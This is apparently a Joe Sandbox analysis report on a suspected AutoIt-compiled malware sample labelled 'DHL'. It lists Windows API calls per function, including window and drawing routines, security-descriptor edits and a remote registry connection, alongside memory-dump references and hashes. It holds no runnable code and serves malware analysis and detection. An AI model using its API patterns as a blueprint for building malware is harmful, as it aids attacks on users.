                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A22E30
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A22E52
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A2303F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: b1089d1edf20a57d4adee477c77c18a5a79e24ca996226b5ae57fdb29a43c6b7
                                                        • Instruction ID: 466a2ed8d354e4e964197a58a7ffcafa0fd8426e2f6c8b28b17a45af39a2928e
                                                        • Opcode Fuzzy Hash: b1089d1edf20a57d4adee477c77c18a5a79e24ca996226b5ae57fdb29a43c6b7
                                                        • Instruction Fuzzy Hash: EA027C75A00214AFDB14DFA8DD89EAE7BB9FF49320F048158F915AB2A1D774AD01CB60
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00A3712F
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A37160
                                                        • GetSysColor.USER32(0000000F), ref: 00A3716C
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00A37186
                                                        • SelectObject.GDI32(?,?), ref: 00A37195
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A371C0
                                                        • GetSysColor.USER32(00000010), ref: 00A371C8
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00A371CF
                                                        • FrameRect.USER32(?,?,00000000), ref: 00A371DE
                                                        • DeleteObject.GDI32(00000000), ref: 00A371E5
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00A37230
                                                        • FillRect.USER32(?,?,?), ref: 00A37262
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A37284
                                                          • Part of subcall function 00A373E8: GetSysColor.USER32(00000012), ref: 00A37421
                                                          • Part of subcall function 00A373E8: SetTextColor.GDI32(?,?), ref: 00A37425
                                                          • Part of subcall function 00A373E8: GetSysColorBrush.USER32(0000000F), ref: 00A3743B
                                                          • Part of subcall function 00A373E8: GetSysColor.USER32(0000000F), ref: 00A37446
                                                          • Part of subcall function 00A373E8: GetSysColor.USER32(00000011), ref: 00A37463
                                                          • Part of subcall function 00A373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A37471
                                                          • Part of subcall function 00A373E8: SelectObject.GDI32(?,00000000), ref: 00A37482
                                                          • Part of subcall function 00A373E8: SetBkColor.GDI32(?,00000000), ref: 00A3748B
                                                          • Part of subcall function 00A373E8: SelectObject.GDI32(?,?), ref: 00A37498
                                                          • Part of subcall function 00A373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A374B7
                                                          • Part of subcall function 00A373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A374CE
                                                          • Part of subcall function 00A373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A374DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID:
                                                        • API String ID: 4124339563-0
                                                        • Opcode ID: dcf1014fc49ba6c12abb2f8f1d47a62b14ad06cc50a6bd5469f4c54186b48f0d
                                                        • Instruction ID: 6890191eeee746d7da4fcb9bb3505a74a8bc393d5db4d3e4478039c003a76baf
                                                        • Opcode Fuzzy Hash: dcf1014fc49ba6c12abb2f8f1d47a62b14ad06cc50a6bd5469f4c54186b48f0d
                                                        • Instruction Fuzzy Hash: 3EA19EB2008301AFDB10DFA0DC48A6FBBA9FB89331F100B19F962A61E1D771E945DB51
                                                        APIs
                                                        • DestroyWindow.USER32(?,?), ref: 009B8E14
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 009F6AC5
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009F6AFE
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009F6F43
                                                          • Part of subcall function 009B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009B8BE8,?,00000000,?,?,?,?,009B8BBA,00000000,?), ref: 009B8FC5
                                                        • SendMessageW.USER32(?,00001053), ref: 009F6F7F
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009F6F96
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009F6FAC
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009F6FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 2760611726-4108050209
                                                        • Opcode ID: 31a040479e00223cb4b9daa20661053d947707c81f8e76b6b46123bf1f4c757e
                                                        • Instruction ID: 29dc458b450908a947afebf5b6381be04a23e546d168274576ea4d75b755252a
                                                        • Opcode Fuzzy Hash: 31a040479e00223cb4b9daa20661053d947707c81f8e76b6b46123bf1f4c757e
                                                        • Instruction Fuzzy Hash: 2312AC31204205DFDB25DF28CD44BB6B7E9FB49320F148469F6899B261CB35EC92DB91
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00A2273E
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A2286A
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A228A9
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A228B9
                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A22900
                                                        • GetClientRect.USER32(00000000,?), ref: 00A2290C
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A22955
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A22964
                                                        • GetStockObject.GDI32(00000011), ref: 00A22974
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A22978
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A22988
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A22991
                                                        • DeleteDC.GDI32(00000000), ref: 00A2299A
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A229C6
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A229DD
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A22A1D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A22A31
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A22A42
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A22A77
                                                        • GetStockObject.GDI32(00000011), ref: 00A22A82
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A22A8D
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A22A97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 725de93e29c5cd4e9d539dc1fe3e699e6fa5da0777fd6ca0cf6f69419c6b206a
                                                        • Instruction ID: 43cd24659539f723a907a06863d3ca90495e54564210b7c5f9c81ade36cca6cf
                                                        • Opcode Fuzzy Hash: 725de93e29c5cd4e9d539dc1fe3e699e6fa5da0777fd6ca0cf6f69419c6b206a
                                                        • Instruction Fuzzy Hash: 9FB15B71A40215BFEB14DFA8DC8AFAE7BA9EB49710F008114F915EB291D774ED41CBA0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A14AED
                                                        • GetDriveTypeW.KERNEL32(?,00A3CB68,?,\\.\,00A3CC08), ref: 00A14BCA
                                                        • SetErrorMode.KERNEL32(00000000,00A3CB68,?,\\.\,00A3CC08), ref: 00A14D36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: f51c45fed9f416408c64e15c04e5bbf27f9a801306f90bbd46f12745f16391c9
                                                        • Instruction ID: 559431475b3ed5fe4343c55af9714d38365cc03215e0ea245ed90d2e0e2f28a9
                                                        • Opcode Fuzzy Hash: f51c45fed9f416408c64e15c04e5bbf27f9a801306f90bbd46f12745f16391c9
                                                        • Instruction Fuzzy Hash: 9E617F30705505EBCB04DF6CCA82DE9B7B1BB8E744B248415F806AB691DB36ED81DBC1
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00A37421
                                                        • SetTextColor.GDI32(?,?), ref: 00A37425
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A3743B
                                                        • GetSysColor.USER32(0000000F), ref: 00A37446
                                                        • CreateSolidBrush.GDI32(?), ref: 00A3744B
                                                        • GetSysColor.USER32(00000011), ref: 00A37463
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A37471
                                                        • SelectObject.GDI32(?,00000000), ref: 00A37482
                                                        • SetBkColor.GDI32(?,00000000), ref: 00A3748B
                                                        • SelectObject.GDI32(?,?), ref: 00A37498
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A374B7
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A374CE
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A374DB
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A3752A
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A37554
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00A37572
                                                        • DrawFocusRect.USER32(?,?), ref: 00A3757D
                                                        • GetSysColor.USER32(00000011), ref: 00A3758E
                                                        • SetTextColor.GDI32(?,00000000), ref: 00A37596
                                                        • DrawTextW.USER32(?,00A370F5,000000FF,?,00000000), ref: 00A375A8
                                                        • SelectObject.GDI32(?,?), ref: 00A375BF
                                                        • DeleteObject.GDI32(?), ref: 00A375CA
                                                        • SelectObject.GDI32(?,?), ref: 00A375D0
                                                        • DeleteObject.GDI32(?), ref: 00A375D5
                                                        • SetTextColor.GDI32(?,?), ref: 00A375DB
                                                        • SetBkColor.GDI32(?,?), ref: 00A375E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 37f45df056a505ee9b1bf5daccd276c524a56f704161cc42172f60154ca0c2a0
                                                        • Instruction ID: f45aade9f90a4006614004b925ad73e0aadd9eab23afb60c9fec3851c7ccaaf9
                                                        • Opcode Fuzzy Hash: 37f45df056a505ee9b1bf5daccd276c524a56f704161cc42172f60154ca0c2a0
                                                        • Instruction Fuzzy Hash: BC615972900218AFDF11DFA4EC49EAEBFB9EB08330F114215F915BB2A1D775A941DB90
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00A31128
                                                        • GetDesktopWindow.USER32 ref: 00A3113D
                                                        • GetWindowRect.USER32(00000000), ref: 00A31144
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A31199
                                                        • DestroyWindow.USER32(?), ref: 00A311B9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A311ED
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A3120B
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A3121D
                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A31232
                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A31245
                                                        • IsWindowVisible.USER32(00000000), ref: 00A312A1
                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A312BC
                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A312D0
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A312E8
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00A3130E
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00A31328
                                                        • CopyRect.USER32(?,?), ref: 00A3133F
                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A313AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 5be07c46b937f60260521cd895cac42e2217eaa484f45dca766418165ab1514a
                                                        • Instruction ID: 9e9294daa584b1bf34e5adcdbcc52140961b3b272f2d9082c11299e9005f6a3d
                                                        • Opcode Fuzzy Hash: 5be07c46b937f60260521cd895cac42e2217eaa484f45dca766418165ab1514a
                                                        • Instruction Fuzzy Hash: 4EB18B71608341AFD744DF64CC85BAABBE4FF85350F00891CF999AB2A1C731E845CB91
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A302E5
                                                        • _wcslen.LIBCMT ref: 00A3031F
                                                        • _wcslen.LIBCMT ref: 00A30389
                                                        • _wcslen.LIBCMT ref: 00A303F1
                                                        • _wcslen.LIBCMT ref: 00A30475
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A304C5
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A30504
                                                          • Part of subcall function 009BF9F2: _wcslen.LIBCMT ref: 009BF9FD
                                                          • Part of subcall function 00A0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A02258
                                                          • Part of subcall function 00A0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A0228A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 1103490817-719923060
                                                        • Opcode ID: b9ece409427f324d4d8543769b7d47fa064bced25bb3153acd7df3f6c5eac460
                                                        • Instruction ID: fbaab47778e51dc7a945f229963d333743bc32bdc866760c738b2f070bb48a5b
                                                        • Opcode Fuzzy Hash: b9ece409427f324d4d8543769b7d47fa064bced25bb3153acd7df3f6c5eac460
                                                        • Instruction Fuzzy Hash: 06E18B312183019FC714DF24C961E6AB7E6BFD8718F14896CF8969B2A6DB30ED45CB81
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009B8968
                                                        • GetSystemMetrics.USER32(00000007), ref: 009B8970
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009B899B
                                                        • GetSystemMetrics.USER32(00000008), ref: 009B89A3
                                                        • GetSystemMetrics.USER32(00000004), ref: 009B89C8
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009B89E5
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009B89F5
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009B8A28
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009B8A3C
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 009B8A5A
                                                        • GetStockObject.GDI32(00000011), ref: 009B8A76
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 009B8A81
                                                          • Part of subcall function 009B912D: GetCursorPos.USER32(?), ref: 009B9141
                                                          • Part of subcall function 009B912D: ScreenToClient.USER32(00000000,?), ref: 009B915E
                                                          • Part of subcall function 009B912D: GetAsyncKeyState.USER32(00000001), ref: 009B9183
                                                          • Part of subcall function 009B912D: GetAsyncKeyState.USER32(00000002), ref: 009B919D
                                                        • SetTimer.USER32(00000000,00000000,00000028,009B90FC), ref: 009B8AA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 112daddd27ce325e874aa94072512ad0e4cbc652101affeb31aead05443357c3
                                                        • Instruction ID: 08df6c3787cef1ed08807060f941d8ddee1571416084a76f3f90f00fd0da21fc
                                                        • Opcode Fuzzy Hash: 112daddd27ce325e874aa94072512ad0e4cbc652101affeb31aead05443357c3
                                                        • Instruction Fuzzy Hash: D0B15D75A00209AFDF14DFA8DD45BEE7BB9FB48324F108229FA15A7290DB74A841CB51
                                                        APIs
                                                          • Part of subcall function 00A010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A01114
                                                          • Part of subcall function 00A010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01120
                                                          • Part of subcall function 00A010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A0112F
                                                          • Part of subcall function 00A010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01136
                                                          • Part of subcall function 00A010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A0114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A00DF5
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A00E29
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A00E40
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A00E7A
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A00E96
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A00EAD
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A00EB5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A00EBC
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A00EDD
                                                        • CopySid.ADVAPI32(00000000), ref: 00A00EE4
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A00F13
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A00F35
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A00F47
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00F6E
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00F75
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00F7E
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00F85
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00F8E
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00F95
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A00FA1
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00FA8
                                                          • Part of subcall function 00A01193: GetProcessHeap.KERNEL32(00000008,00A00BB1,?,00000000,?,00A00BB1,?), ref: 00A011A1
                                                          • Part of subcall function 00A01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A00BB1,?), ref: 00A011A8
                                                          • Part of subcall function 00A01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A00BB1,?), ref: 00A011B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: 5d64c6741ff67626d429bd36b2b63231fce5d8cbd2550251a86061ae4a3372f9
                                                        • Instruction ID: bb6bdc94084b6de3ff058a9ee20499e73470f02e57fcdc5711738ef2e142bdbe
                                                        • Opcode Fuzzy Hash: 5d64c6741ff67626d429bd36b2b63231fce5d8cbd2550251a86061ae4a3372f9
                                                        • Instruction Fuzzy Hash: 91716A7290021AABDF20DFA4ED49FEEBBB8BF05311F044215FA59F6191D7319A06DB60
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2C4BD
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A3CC08,00000000,?,00000000,?,?), ref: 00A2C544
                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A2C5A4
                                                        • _wcslen.LIBCMT ref: 00A2C5F4
                                                        • _wcslen.LIBCMT ref: 00A2C66F
